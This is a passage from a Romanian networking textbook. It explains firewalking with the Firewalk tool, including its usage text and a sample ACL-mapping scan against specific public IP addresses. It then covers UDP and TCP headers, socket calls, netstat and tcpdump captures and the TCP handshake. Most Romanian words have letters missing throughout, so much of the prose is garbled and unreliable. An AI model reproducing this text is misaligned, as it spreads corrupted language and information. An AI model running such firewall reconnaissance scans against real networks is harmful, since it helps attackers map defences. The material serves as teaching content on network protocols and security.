Firewalking ep ezi tă o etodă de ide tifi a e a egulilo listelo de a es o figu ate pe
u fi e all a e p otejează o eţea „ţi tă . Teh i a folosita ep ezi tă o dez olta e a
algoritmului de „traceroute şi se azează pe o a aliză a pa hetelo IP pe t u a dete i a
da a a estea pot aju ge la siste ul ţi tă p i firewall.
După e u router de ide i te faţa de ieși e a u ui pa het, a esta de e e tează aloa ea
câmpului TTL (Time To Live) di a tetul IP al pa hetului; da ă oua aloa e este ai i ă sau
egală u ze o, routerul a e u ţa la t i ite ea pa hetului şi a t a s ite î apoi ăt e siste ul
su să u pa het ICMP de tip 11 – TTL Expired i t a sit. A est lu u îi o u i ă su sei la e
router a expirat pachetul. Bazându-se pe a est o po ta e t şi pe ipoteza ă u e istă
e hipa e te a e să filt eze t afi ul ICMP pe d u , t a e oute t i ite pa hete o se uti e
ăt e desti aţie i e e tâ d aloa ea â pului TTL a e po ește i iţial de la unu.
Firewalk este p og a ul a e i ple e tează teh i ile e ţio ate a te io pe t u a
ide tifi a p oto oalele şi se i iile pe ise p i t -un firewall. Pentru a porni scanarea,
ata ato ul a e e oie de u ătoa ele i fo aţii:
 adresa IP a firewall-ului ce va fi scanat (packet filter);
 adresa IP din spatele firewall-ului pe t u a e ifi a egulile ăt e a easta destination host).
378 | ‘ e ţ e l e L o a l e
Retea
Protejata
INTERNET
STATIE
DESTINATIE
FIREWALL ATACATOR
10-11: O i frastru tură u fire all
Firewalk funcţio ează t i iţâ d pa hete TCP sau UDP pe po tu ile spe ifi ate de ata ato
cu o valoare TTL cu unu mai mare decât a firewall-ului a e este s a at. Astfel, da ă
e hipa e tul de filt a e pe ite t afi ul, a t a s ite pa hetul ăt e desti aţie u de a esta
a e pi a t i iţâ d î apoi u esaj de tip TTL Expired i t a sit. Da ă firewall-ul nu permite
t afi ul, atu i pa hetul este a u at şi ata ato ul fie u a p i i î apoi niciun ăspu s el ai
adesea , fie a p i i u ăspu s ICMP tip od Destination Unreachable – Communication
Administratively Prohibited . T i iţâ d u u ă de p o e ăt e ad esele IP şi po tu ile
interesante din spatele firewall-ului, şi a alizâ d ăspu su ile, u ata ato poate o ţi e o
ha tă a ACL-urilor definite.
Firewalk 5.0 [gateway ACL scanner]
Usage : firewalk [options] target_gateway metric
[-d 0 - 65535] destination port to use (ramping phase)
[-h] program help
[-i device] interface
[-n] do not resolve IP addresses into hostnames
[-p TCP | UDP] firewalk protocol
[-r] strict RFC adherence
[-S x - y, z] port range to scan
[-s 0 - 65535] source port
[-T 1 - 1000] packet read timeout in ms
[-t 1 - 25] IP time to live
[-v] program version
[-x 1 - 8] expire vector
Maparea regulilor cu firewalk a e două faze:

Des operirea rețelei. “up a u ită î ja go şi „ramping up hopcounts , a eastă etapă a e
s opul al ulă ii u ă ului de hopu i pâ ă la firewall. Metodologia este ide ti ă u ea
a i tită a te io pe t u traceroute. Câ d a est u ă este o ţi ut, se poate t e e î faza doi,
ia s a a ea este a u „bound .
Scanarea propriu-zisă. A esta etapă i pli ă t i ite ea pa hetelo ăt e desti aţie pe
po tu ile TCP/UDP i te esa te pe t u ata ato şi a ti a ea u o o o et e pe t u fie a e
pa het. Da ă u ăspu s u este p i it pa ă la e pi a ea ti pului, se o side ă ă po tul este
î his de ăt e firewall.
Exemplu de scanare cu firewalk:
firewalk -n -p TCP -S20-25,80,443 80.86.16.183 80.86.200.240
Firewalk 5.0 [gateway ACL scanner]
Firewalk state initialization completed successfully.
TCP-based scan.
Ramping phase source port: 53, destination port: 33434
Hotfoot through 80.86.16.183 using 80.86.200.240 as a metric.
Ramping Phase:
1 (TTL 1): expired [192.168.128.1]
2 (TTL 2): expired [194.116.200.65]
3 (TTL 3): expired [86.55.4.169]
4 (TTL 4): expired [193.19.194.202]

5 (TTL 5): expired [80.86.15.130]
6 (TTL 6): expired [80.86.16.183]
Binding host reached.
Scan bound at 7 hops.
Scanning Phase:
port 20: A! unknown (unreach ICMP_UNREACH_FILTER_PROHIB) [80.86.200.240]
port 21: *no response*
port 22: A! open (port listen) [80.86.200.240]
port 24: *no response*
port 25: A! open (port not listen) [80.86.200.240]
port 443: A! open (port not listen) [80.86.200.240]
Scan completed successfully.
Total packets sent: 14
Total packet errors: 0
Total packets caught 13
Total packets caught of interest 12
Total ports scanned 8
Total ports open: 3
Total ports unknown: 3
380 | ‘ e ţ e l e L o a l e
11 Protocoale de nivel transport

„The u e of thi gs that e ou t as f ee toda that used to ost o e su h as TCP/IP a e
uite sig ifi a t.
Cameron Purdy
Ce se învaţă di a est apitol?

 Care este rolul nivelului Transport
 Ca e este dife e ţa di t e UDP şi TCP
 Ca e este p i ipiul de fu ţio a e a TCP
 Cu se ealizează o t olul flu ului la TCP
Cine este...
Robert Kahn este oauto , î p eu ă u Vi t Ce f, al p oto oalelo TCP și IP a e au
de e it p oto oalele fu da e tale î I te et. P oie ta ea elo două p oto oale a a ut î
ede e folosi ea a două i elu i î a e TCP se o upă u se i iile de asigu a e a
o e ti ităţii și a o t olului flu ului. Î p eze t este p eședi tele CNRI Co po atio fo
National Research Initiatives).
11.1 Noţiuni generale

Ni elul t a spo t, al pat ulea i el di sti a de p oto oale O“I, ăspu de e e ilo sosite de
la i elul sesiu e şi t a s ite e e i i elului eţea.
Nivelul transport este espo sa il u asigu a ea t a spa e ţei t a sfe ului î t e două
siste e. ‘olul său este, de o i ei, e upe a ea î az de e oa e şi o t olul flu ului, asigu â d
un transfer de date complet. Aceste roluri sunt îndeplinite prin folosirea protocolului orientat
pe conexiune, Transmission Control Protocol (TCP). Protocolul User Datagram Protocol
UDP , a e fu ţio ează pe ază de datag a e, lasă a este olu i pe sea a apli aţiei.
Ni elul t a spo t t a sfo ă se i iile de ază şi esigu e ale i elului etea în servicii
ult ai pute i e. E istă o suită de se i ii a e pot fi fu izate opţio al la a est i el.
Niciunul di ele u este o ligato iu, î t u ât u toate apli aţiile do es a toate a este se i ii
să fie utilizate. Câte a di se i ii su t:
 orientat conexiune: î t u ât apli aţiile lu ează ult ai uşo u se i ii o ie tate o e iu e,
ia i elul eţea u ofe ă de ât se i ii fă ă o e iu e, u astfel de se i iu este adesea utilizat;
 controlul fluxului: deoarece memoria unui sistem este limitată, lipsa o t olului flu ului a
du e la o gestio a ea t afi ului ia siste ul u a putea eţi e sufi ie t de ultă i fo aţie
pentru a o prelucra;
 multiplexarea prin porturi: po tu ile ep ezi tă e a is ul de ază p i a e se pot ad esa
mai multe entităţi î ad ul a eleiaşi lo aţii a eluiaşi siste ; apli aţiile de eţea o as ulta
fie a e pe u po t p op iu p i i ea de i fo aţii, oti pe t u a e ai ulte apli aţii pot ula
simultan.
În cadrul Internet-ului e istă ai ulte p oto oale la i elul transport, dar cele mai
utilizate su t TCP şi UDP. TCP este u p oto ol o ple , fu izâ d u se i iu o ie tat pe
conexiune, controlul fluxului, porturi multiple, transmiterea datelor în ordine. UDP este un
se i iu si plu a e lu ează u datag a e, furnizând doar multiplexarea prin porturi. Alte
protocoale sunt Datagram Congestion Control Protocol DCCP şi Stream Control Transmission
Protocol (SCTP).
381 | P r o t o c o a l e d e n i v e l t r a n s p o r t
11.2 UDP
11.2.1 Caracteristici UDP
UDP (User Datagram Protocol)1 este un protocol de nivel transport construit special
pentru a oferi un serviciu de comunicare cât mai simplu peste IP.
Câteva caracteristici ale UDP-ului sunt:
 este u se i iu de tip datag a ă: e e ile de t i ite e de date p i ite de la i elul supe io
sunt tratate independent;
 comunicarea are loc fă ă sta ili ea u ei legătu i connectionless : u e istă e a is e de
sta ili e şi te i a e a u ei o e iu i; toate datele su t t i ise î ad ul u ui si gu pa het IP,
a e e e tual a fi supus f ag e tă ii;
 u se ga a tează faptul ă datele o aju ge la desti aţie best effort : aju ge ea la desti aţie a
datelo u este a u ţată su sei;
 datele t a spo tate su t p otejate de o su ă de o t ol a a te isti ă opţio ală i iţial da
t e ută a e esa ă must)2);
 î ă a ea supli e ta ă overhead-ul) introdusă este i i ă: doa o teţi.
Câte a utiliză i tipi e ale UDP-ului sunt în:
 se i ii de ezol a e a u elo DN“ : î t e ă ile şi ăspu su ile s u te pot fi ai efi ie t
implementate peste UDP;
 fluxuri multimedia: mecanismele complicate de control al fluxului ale TCP-ului ar deprecia
interactivitatea;
 se e de fişie e NF“ : a est tip de apli aţii su t î ge e al ulate î eţele lo ale u
pe fo a ţe idi ate a e u e esită e a is ele TCP;
 BitTorrent;
 a age e tul eţelei “NMP ;
 protocoale de rutare (RIP).
11.2.2 Formatul datagramelor UDP

Datagramele UDP sunt formate dintr-un antet urmat de datele care se doresc transmise
da ă e istă .
11-1: Structura unei datagrame UDP
Antetul cuprinde:
 po t su să - iţi; Î p eu ă u ad esa IP a su sei, a est u ă ide tifi ă î od u i
expeditorul datagramei UDP;
 po t desti aţie - iţi; Î p eu ă u ad esa IP a desti aţiei, a est u ă ide tifi ă î od u i
desti aţia do ită pe t u datag a a UDP;
1
2
382 | ‘ e ţ e l e L o a l e
 lungimea datagramei UDP - iţi; Lu gi ea o side ădatag a a UDP u tot u a tet şi p i

u a e a e o aloa e i i ă de o teţi.
 su ă de o t ol - iţi; “u a de o t ol a ope ă î t eaga datag a ă UDP ât şi u pseudo-
a tet de o teţi fo at di :
o adresa IP a sursei - iţi;
o ad esa IP a desti aţiei - iţi;
o iţi de ze o pe t u ali ie e;
o u ă ul p oto olului UDP ep eze tat pe iţi;
o lungimea datagramei UDP - iţi.
“u a de o t ol este al ulată a u ă ul de u i te de iţi i luse î pachet. Fiind
u ă ultiplu de iţi, la sfâ şitul datelo se adaugă u u ă pot i it de iţi de ze o. Da ă
su a este atu i ea a fi sto ată a toţi iţii pe . U î â pul su ei de o t ol
i di ă faptul ă su a de o t ol u a fost al ulată. O se aţie: hia da ă u lie t a e i hi at
î od e pli it al ulul su ei de o t ol, el este o ligat să e ifi e su a pa hetelo a e
soses şi au su a al ulată.
Porturi
Câ pul aso iat po tu ilo a e iţi, de i alo ile posi ile su t up i se î t e şi .
Po tul este eze at, da este u po t su să pe is da ă p o esul t a s iţăto u aşteaptă
esaje de ăspu s.
Po tu ile up i se î t e şi su t po tu i eze ate aşa zisele „known ports ; pe u
sistem Unix folosirea unuia din aceste po tu i e esită d eptu i p i ilegiate d eptu i de root).
Po tu ile up i se î t e şi su t po tu ile î egist ate folosite de Kazaa, Ja a
RMI Registry, servere SQL, etc.).
Po tu ile up i se î t e şi su t po tu i efe e e şi sunt utilizate ca porturi
te po a e, de o i ei de ăt e lie ţii a e o u i ă u se e ele.
11.3 TCP
11.3.1 Caracteristici TCP
Deoa e e p oto olul IP este de tip datag a ă, utiliza ea lui di e t î apli aţii, a e î
general au nevoie de conexiuni sigure, este mult prea a e oioasă. Di a este oti e peste IP a
fost construit un alt protocol, TCP (Transmission Control Protocol , a e o e tează a este
probleme. TCP1 de i e astfel, alătu i de IP, p oto olul de ază utilizat î I te et. Cele două
protocoale sunt reprezentati e pe t u sti a de p oto oale de fa to e gu e ează
fu ţio a ea I te et-ului.
Alătu i de UDP, TCP se situează pe i elul t a spo t î ie a hia de p oto oale, de i î t e
i elul apli aţie şi i elul eţea. Cu toate ă se azează pe a elaşi p oto ol IP a şi UDP, TCP
fu izează ăt e i elul apli aţie u totul alt tip de se i ii: se i ii o ie tate-conexiune, sigure,
de tip flu de o teţi.
Termenul orientat-conexiune p esupu e ă î t e ele două apli aţii a e o u i ă
utilizâ d TCP t e uie să se sta ileas ă o o e iu e î ai te a t a sfe ul de date să ai ă lo .
A eastă o e iu e u este u a fizi ă i i tuală. Tipul de o e iu e este ase ă ăto u
siste ul de telefo ie lasi ă: o pe soa ă fo ează u u ă şi a ia î o e tul î a e
ealaltă pe soa ă ăspu de se poate î epe o e saţia. Fii d o o e iu e pu t la pu t, u
e istă oţiu ile de broadcast sau multicast.
Transferul sigur de date este asigu at î u ăto ul od:
1
http://tools.ietf.org/html/rfc1122; http://tools.ietf.org/html/rfc793
 Datele su t î pă ţite î f ag e te a ă o di e siu e opti ă e dete i ată de TCP, spre

deose i e de UDP a e t i ite datag a e UDP o espu zătoa e u di e siu ea datelo
p i ite de la i elul apli aţie. U itatea de date t i isă de TCP ăt e i elul eţea poa tă
numele de segment.
 Câ d TCP t i ite u seg e t po eşte u timer şi, da ă u se p i eşte o fi a ea
segmentului respectiv într-un anumit timp, îl retransmite.
 Î o e tul î a e se p i eşte u seg e t, TCP t i ite o o fi a e di oti e de efi ie ţă
a easta poate fi a â ată u a u it i te al de ti p .
 În headerul TCP este e ţi ută o su ă de o t ol pe t u dete ta ea odifi ă ilo î date.
Da ă se e epţio ează u seg e t o upt, TCP îl ig o ă u â d să fie et a s is dato ită
ep i i ii o fi ă ii.
 Deoarece segmentele TCP sunt transmise mai departe încapsulate în datagrame IP, acestea pot
aju ge î altă o di e de ât ea î a e au fost t i ise. A est lu u se î tâ plă di auză ă
p oto olul IP lu ează u pa hete de date, fă ă a ga a ta t a s ite ea a esto a î o di e. Di
a est oti , la desti aţie, TCP foloseşte u e e de se e ţă pe t u a eo do a seg e tele
î ai te de a le li a ăt e i elul apli aţie. De ase e ea, TCP asigu ă ig o a ea dupli atelo .
 TCP asigu ă o t olul flu ului î o diţiile î a e iteza de t i ite e a datelo la su să poate fi
mult mai a e de ât apa itatea de p elu a e la desti aţie.
Serviciul oferit de TCP este de tip flu de o teți deoa e e ofe ă ga a ţii ă flu ul de date
t i is de su să a fi li at fă ă odifi ă i la desti aţie. Co pa ati , UDP p odu e pe t u
fiecare transfer ce ut de i elul apli aţie u pa het IP a e ulte io poate fi supus
f ag e tă ii a e, da ă aju ge la desti aţie o e t u su a de o t ol alidă , a fi li at
di e t i elului apli aţie fă ă a ga a ta î eu fel o di ea.
TCP supo tă ea ai a e pa te di apli ţiile ele ai popula e ale I te et-ului, incluzând
World Wide Web, E-mail, Secure Shell, etc. La începutul secolului 21, TCP este folosit
p epo de e t î pa hetele a e i ulă î I te et. La ga sa ăspâ di e este do ada iziu ii de
e epţie pe a e p oie ta ţii p oto olului au a ut-o la începutul anilor `80.
11.3.2 Formatul segmentelor TCP

Pachetele de date transmise de TCP, segmentele, sunt formate dintr-un antet de 20 de
o teţi u at de datele p i ite de la i elul apli aţie. A tetul poate u eo i o ţi e şi o se ie de
opţiu i, az î a e poate aju ge la o teţi.
Antetul unui segment TCP cuprinde:
 po t su să - iţi pe t u spe ifi a ea po tului apli aţiei t a s iţătoa e.
 po t desti aţie - iţi pe t u spe ifi a ea po tului apli aţiei e e epţio ează seg e tul TCP.
 u ă de se e ţă - iţi – identifica pozitia curenta a primului octet din segment în cadrul
i t egului flu de o u i aţie TCP; dupa e se ati ge aloa ea 32-1, se revine la 0.
 confirmare - iţi – identifica urmatorul octet de date pe care transimatorul il asteapta de la
receptor; astfel, acest numar va fi cu 1 mai mare decat cel asociat celui mai recent receptionat
octet de date.
 lungimea antetului - iţi – spe ifi ă di e siu ea a tetului a u ă de u i te de de iţi
o teţi ; a tetul poate a ea î t e şi de o teţi, de i aloa ea a estui â p a fi î t e
= o teţi şi = .
 iţi eze aţi pe t u utiliză i iitoa e
 iţi de o t ol ep eze tâ d u ătoa ele flag-uri ce pot fi setate simultan:
384 | ‘ e ţ e l e L o a l e
11-2: Structura unui segment TCP
Urgent Pointer (URG) - câmpul urgent pointer este valid

Acknowledgement (ACK) - câmpul de confirmare (numar secventa confirmat) este valid
Push Function (PSH) - desti aţia t e uie să t i ită datele ăt e i elul apli aţie ât ai
devreme
Reset the Connection (RST) - se do eşte eseta ea o e iu ii; se t a s ite e epto ului ă
t a s iţăto ul a ulează o e iu ea, astfel î ât i fo aţiile şi uffe -ele alocate pot fi
eliberate
Synchronize (SYN) – t a s iţăto ul î ea ă „si o iza ea u e elo de se e ţă; este
folosit la sta ili ea u ei o e iu i î t e u t a s iţăto şi u e epto
No More Data from Sender (FIN) - î hide ea o e iu ii: e epto ul este a u ţat ă
t a s iţăto ul a aju s la sfâ şitul flu ului de o teţi di o e iu ea TCP u e tă
 dimensiunea ferestrei - iţi – ep ezi tă u ă ul de o teţi î epâ d u u ă ul de
se e ţă o ţi ut î â pul de o fi a e pe a e desti aţia e dispusă să-l primească; este
li itat la o teţi da , u toate ă pa e o li ită destul de a e, e istă situaţii â d se
doresc valori mult mai mari
 suma de control - iţi – a eastă su ă de o t ol a ope ă î t egul seg e t TCP atât datele,
ât şi a tetul TCP şi, sp e deose i e de UDP, este o ligato iu să fie o pletată de t a s iţăto
şi e ifi at de e epto .
 urgent pointer - iţi – este utilizat pentru specificarea deplasamentului ultimului octet de
date trimis în regim urgent.
 opţiu i - pâ ă la de o teţi – furnizează o se ie de pa a et i pe t u o fu ţio alitate spe ială
11.3.3 Conexiunea şi comunicaţia TCP

Dupa cum se poate observa din câmpurile antetului, protocolul TCP este un protocol
o ple . O do adă este u ă ul a e de ‘FC-u i a e se efe ă la a est p oto ol. Pentru o
ai uşoa ă şi ai u ă î ţelege e a a estuia, u ătoa ele se ţiu i o p eze ta
fu ţio alitatea p oto olului î pa alel u i te faţa de p og a a e u so keţi Berkeley,
de e ită i te faţa u i e sală de p og a a e a apli aţiilo de eţea.
11.3.3.1 I terfața socket

Ca şi a st a tiza e, u socket este i te faţa pe a e siste ul de ope a e o pu e la
dispoziţia apli aţiei pe t u a a easta să poată o u i a p i i te ediul eţelei u o altă
apli aţie de pe u alt siste . U socket ide tifi ă î od u i u apăt (endpoint) dintr-o
o e iu e. P oto olul TCP fu ţio ează î egi lie t-server. Socketul lie t şi socketul server
fo ează o o e iu e. Din acest punct de vedere un socket poate fi considerat un tuplu:
<protocol nivel 3, adresa nivel 3, protocol nivel 4, adresa nivel 4>
O o e iu e este o pe e he fo ată di doi so keţi: <socket client, socket server>.

Î a ea ajo itate a azu ilo , p oto olul de i el este IP, ia ad esa este o ad esă IP
pe de iţi. P oto olul de i el poate fi UDP sau TCP, iar adresa de nivel 4 este portul
asociat conexiunii.
I te faţa de p og a a e i pu e două apelu i pe t u ea ea u ui socket: apelul socket şi
apelul bind. Un exemplu de creare a unui socket este:
int s;
struct sockaddr_in addr;
s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP);
bind (s, (struct sockaddr *) &addr, sizeof (addr));
Apelul socket spe ifi ă p oto olul de i el IP – PF_INET şi p oto olul de i el TCP –
IPPROTO_TCP). Apelul bind spe ifi ă elelalte două o po e te ale tuplului e defi eşte un
socket: ad esa IP şi po tul TCP se egăses î â pu ile st u tu ii addr).
Î ă de la apa iţia TCP şi a i te feţei socket, odelul de o u i aţie utilizat a fost odelul
client-server. Î ad ul a estui odel, u siste eează u socket şi aşteaptă i iţie ea u ei
conexiuni de pe un alt sistem; socketul se hea ă socket în starea listening şi este spe ifi
se e ului, ia siste ul a e i iţiază o e iu ea este lie tul.
Cei doi socketi (socketul lie t şi socketul se e se eează o fo odelului de mai sus.
În continuare, socketul server este plasat în starea listening, ia so ketul lie t a i iţia
o e iu ea. Pe t u se e , se utilizează apelu ile listen şi accept, iar pentru client apelul
connect, ca mai jos:
/* server */
listen (server_sock, 10);
new_sock = accept (server_sock, &cli_addr, &cli_addr_len);
/* client */
connect (client_sock, &serv_addr, &serv_addr_len);
Faptul ă u se e so ket se găseşte î sta ea listening poate fi observat cu ajutorul

comenzii netstat (NETwork STATistics):
# netstat --tcp --listening --numeric
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:16114 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:985 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
Ad esa . . . i di ă faptul ă socketul î auză as ultă pe toate i te feţele siste ului;

este echivalentul macrodefiniţiei INADDR_ANY pusă la dispoziţie de i te faţa de p og a a e
cu so keţi.
386 | ‘ e ţ e l e L o a l e
Toate etapele p eze tate pâ ă î a est o e t au î se at ea ea u o st u tu i î

ad ul siste ului de ope a e p egătitoa e pe t u i iţie ea u ui o e iu i TCP. Plasa ea u ui
socket în starea listening din partea serverului este o erere pasi ă de conectare (passive
open . P oto olul TCP i t ă î a ţiu e î o e tul î a e lie tul i iţiază o e iu ea ăt e
server prin intermediul apelului connect.
11.3.3.2 I ițierea u ei conexiuni TCP

Folosirea apelului connect di ad ul apli aţiei lie t o du e la i iţie ea u ei o e iu i
TCP î t e lie t şi se e , u ită erere a ti ă de conexiune (active open). Modul de
transmisie pentru TCP este full-duplex, e istâ d două a ale de o u i aţie âte unul pentru
fie a e di e ţie . A est lu u î sea ă, ă după i iţie ea o e iu ii, atât se e ul ât şi lie tul
au ol dual: t a s iţăto şi e epto ; o t e ui i iţiate două sesiu i de o u i a e: lie t-
se e şi se e - lie t. P oto olul de i iţie e poa tă u ele de three-way handshake şi este
prezentat în figura de mai jos:
11-3: Stabilirea unei conexiuni TCP
Cei t ei paşi ai p oto olului su t după u u ează:

1. Ce e ea a ti ă este ealizată p i t a s iterea unui segment cu flag-ul SYN activat.
2. “e e ul ăspu de p i t a s ite ea u ui seg e t u flag-urile SYN şi ACK activate.
3. Clientul transmite un segment cu flag-ul ACK activat.
Î a est o e t, atât se e ul ât şi lie tul au p i it o fi a ea sta ilirii conexiunii.
Rolul flag-ului SYN, dupa u îi spu e şi u ele, este a ela de si o iza ea a u e elo
de se e ţă î t e t a s iţăto şi e epto . U e e plu ai detaliat al u ei i iţie i de
o e iu e TCP este u ăto ul:
 Clientul transmite un segment de sincronizare (flag-ul SYN a ti at pe t u i iţie ea u ei
conexiuni. Orice segment SYN o ţi e şi u u ă de se e ţă. “e o side ă ă u ă ul de
se e ţă este x.
 “e e ul p i eşte seg e tul, eţi e u ă ul de se e ţă x t a s is de lie t şi ăspu de u
un segment în care sunt activate flag-urile SYN şi ACK. Flag-ul ACK alidează p eze ţa
u ă ului de o fi a e. Nu ă ul de o fi a e este u ăto ul u ă de se e ţă pe a e
se e se aşteaptă să-l p i eas ă de la lie t, adi ă x+1. “e e ul foloseşte flag-ul SYN pentru a
i iţia o sesiu e de ăspu s, astfel î ât seg e tul TCP o ţi e p op iul u ă de se e ţă cu

valoarea y.
 Clie tul ăspu de u u ăto ul u ă de se e ţă (x+1 şi u u ă de o fi a e (y+1), care
este u ă ui de se e ţă al serverului i e e tat u . Clie tul se aşteaptă a u ă ul de
se e ţă u ăto t i is de se e să fie y+1.
Folosind utilitarul tcpdump se pot u ă i pa hetele folosite î ad ul p oto olului de
i iţie e. Mai jos este p eze tată o ito iza ea u o astfel de pa hete:
IP 127.0.0.1.36583 > 127.0.0.1.3456: S 2248547107:2248547107(0) win 5840 <mss
1460,sackOK,timestamp 13245384 0,nop,wscale 2>
IP 127.0.0.1.3456 > 127.0.0.1.36583: S 2238475525:2238475525(0) ack 2248547108 win 5792
<mss 1460,sackOK,timestamp 13245384 13245384,nop,wscale 2>
IP 127.0.0.1.36583 > 127.0.0.1.3456: . ack 2238475526 win 1460 <nop,nop,timestamp
13245384 13245384>
Î e e plul de ai sus, atât se e ul ât şi lie tul ulează pe a elaşi siste lo alhost –

. . . . “e e ul as ultă o e iu i pe po tul , ia lie tul i iţiază o e iu ea de pe
po tul . Cele seg e te o espu d elo paşi ai p oto olului de i iţie e:
 În cadrul primului segment, transmis de client serverului, flag-ul SYN este a ti at p eze ţa
simbolului S se ifi ă p eze ţa flag-ului SYN). Nu ă ul de se e ţă este 2248547107.
 “e e ul ăspu de lie tului u flag-urile SYN şi ACK a ti ate p eze ţa si olului ack
se ifi ă p eze ţa flag-ului ACK). Nu ă ul de se e ţă pe t u sesiu ea de ăspu s i iţiată de
server este 2238 ; p eze ţa flag-ului ACK alidează u ă ul de o fi a e, care este
+ , adi ă to ai u ă ul de se e ţă di seg e tul t a s is de
client incrementat.
 Clientul ăspu de u u seg e t u flag-ul ACK activat. Nu ă ul de o fi are este, conform
aşteptă ilo , + .
Nu e ele de se e ţă utilizate pe t u sta ili ea elo două sesiu i su t u e e ge e ate
aleator.
E istă, î să, şi s e a ii î a e p oto olul de o u i aţie poate eşua. Astfel, u ele e e i de
co e iu e pot fi espi se, sau pot fi pie dute pe d u , sau pot fi filt ate. Da a se î ea ă
conectarea pe un port inexistent, sistemul de operare va reseta conexiunea prin utilizarea
flag-ului RST. Î e e plul de ai jos, lie tul î ea ă o e ta ea pe un astfel de port:
IP 127.0.0.1.43550 > 127.0.0.1.3456: S 3689144420:3689144420(0) win 32767 <mss
IP 127.0.0.1.3456 > 127.0.0.1.43550: R 0:0(0) ack 3689144421 win 0
Clie tul î ea ă să se o e teze pe po tul şi t i ite seg e tul de i iţie e o e iu e

(cu flag-ul SYN activat). Întrucât portul 3458 nu este folosit de niciun socket în starea listening,
sistemul de operare transmite un segment cu flag-ul RST a ti at p eze ţa si olului R
se ifi ă p eze ţa flag-ului RST . “eg e tul de ăspu s o ţi e, de ase e ea, flag-ul ACK
a ti at şi u ă ul de o fi a e aşteptat.
U alt s e a iu este a ela î a e pa hetele de i iţie e de o e iu e su t filt ate fă ă
transmiterea unui pachet de resetare a conexiunii sau su t pie dute. Î a eastă situaţie,
clientul va încerca periodic deschiderea unei conexiuni prin retransmiterea pachetului de
i iţie e de o e iu e. Mai jos su t p eze tate âteva din pachetele transmise de client:
IP 127.0.0.1.41706 > 127.0.0.1.3456: S 691948505:691948505(0) win 32767 <mss
IP 127.0.0.1.41706 > 127.0.0.1.3456: S 691948505:691948505(0) win 32767 <mss
IP 127.0.0.1.41706 > 127.0.0.1.3456: S 691948505:691948505(0) win 32767 <mss
IP 127.0.0.1.41706 > 127.0.0.1.3456: S 691948505:691948505(0) win 32767 <mss
IP 127.0.0.1.41706 > 127.0.0.1.3456: S 691948505:691948505(0) win 32767 <mss
“e o se ă ă seg e tele t a s ise su t ide ti e di pu t de ede e al o ţi utului.

“i gu a dife e ţă este dată de ti pii de et a s isie i di aţi de si olul timestamp) care
388 | ‘ e ţ e l e L o a l e
cresc expone ţial „exponential backoff , a a te isti pe t u o i e et a s isie a u ui

segment TCP.
La fel se poate î tâ pla da ă seg e tul de ăspu s seg e tul di p oto olul de i iţie e
a conexiunii) este filtrat. Serverul va retransmite periodic segmentul conţi â d flag-urile SYN
şi ACK activate.
Un firewall p eze t î t e lie t şi se e poate filt a seg e tele de i iţie e de o e iu e.
Acesta va putea respinge segmentele prin transmiterea unui pachet ICMP tipic (Destination
Unreachable sau poate să u î t ep i dă nicio a ţiu e al doilea s e a iu de eşe . U astfel
de fi e all este folosit pe t u p oteja ea eţelelo lo ale. Astfel, ea ai a e pa te a e e ilo
de conexiune din exterior spre eţeaua lo ală su t filt ate. A est lu u se ealizează p i
respi ge ea seg e telo a e o ţi a ti at flag-ul SYN da u o ţi a ti at flag-ul ACK; flag-
ul ACK u t e uie sa fie a ti pe t u a fa e deose i ea î t e seg e tul de i iţie e de
o e iu e şi el de ăspu s la seg e tul de i iţie e de o e iu e.
11.3.3.3 Transferul de date

După u s-a p e izat a te io , la i elul i te feţei socket o e iu ea este sta ilită î
o e tul î a e so ketul se e se găseşte î sta ea listening după apelul accept, iar clientul
i iţiază o e iu ea folosi d connect. În momentul în care co e iu ea este ealizată
p oto olul de i iţie e a o e iu ii se î heie u su es , apelul accept întoarce descriptorul
unui nou socket. Acest nou socket este el a e a oo do a t a sfe ul de date î t e lie t şi
server. Cu alte cuvinte, socketul aflat în starea listening este utilizat numai pentru ascultarea
de e e i de i iţie e de o e iu e, u â d a, ulte io sta ili ii o e iu ii, t a sfe ul de date
să fie i te ediat de u alt socket. O altă o e iu e p esupu e ea ea u ui ou socket.
Fiecare socket ou eat a fi folosi a elaşi po t a şi socketul listener. Deosebirea între so keţi
este dată de socketul lie t. Î fu ţie de ad esa IP şi po tul socketului peer se ealizează
ultiple a ea o e iu ii. “iste ul de ope a e a e ţi e o aso ie e î t e conexiunea
ealizată de ăt e se e u u lie t şi socketul a e ealizează o u i aţia efe ti a pe t u a
putea t a s ite i fo aţiile ăt e/de la a esta di u ă.
Majo itatea se e elo li itează u ă ul de o e iu i a ti e la u o e t dat. U u ă
a e de o e iu i î sea ă u u ă a e de so keţi a e o su ă esu sele siste ului.
Des hide ea u ui u ă a e de o e iu i este u ata tipi Denial of Service (DoS). Un astfel
de atac este SYN flood a e des hide u u ă a e de o e iu i pe u sistem.
T a sfe ul de date folosi d i te faţa socket se ealizează folosi d apelu ile send şi recv
(sau read şi write), ca mai jos:
/* server dupa accept */
read (new_sock, buffer, 1000); /* se citesc 1000 octeti */
write (new_sock, buffer, 1000); /* se scriu 1000 octeti */
/* client dupa connect */
write (client_sock, buffer, 1000); /* se scriu 1000 octeti */
read (client_sock, buffer, 1000); /* se citesc 1000 octeti */
Pe t u t a s ite ea şi e epţia a âte o teţi atât de ăt e lie t ât şi de ăt e

se e , pa hetele t a s ise su t afişate de tcpdump ca mai jos:
IP 127.0.0.1.3456 > 127.0.0.1.33552: P 1272511013:1272512013(1000) ack 1265612124 win
32767 <nop,nop,timestamp 78548047 78548047>
78548047 78548047>
IP 127.0.0.1.33552 > 127.0.0.1.3456: P 1265612124:1265613124(1000) ack 1272512013 win
32767 <nop,nop,timestamp 78548048 78548047>
78548048 78548048>
P i ul pa het ep ezi tă t a s ite ea a de o teţi de la se e ăt e lie t. “e

o se ă p eze ţa flag-ului PSH, folosit pe t u a t a s ite datele ât ai u â d posi il ăt e
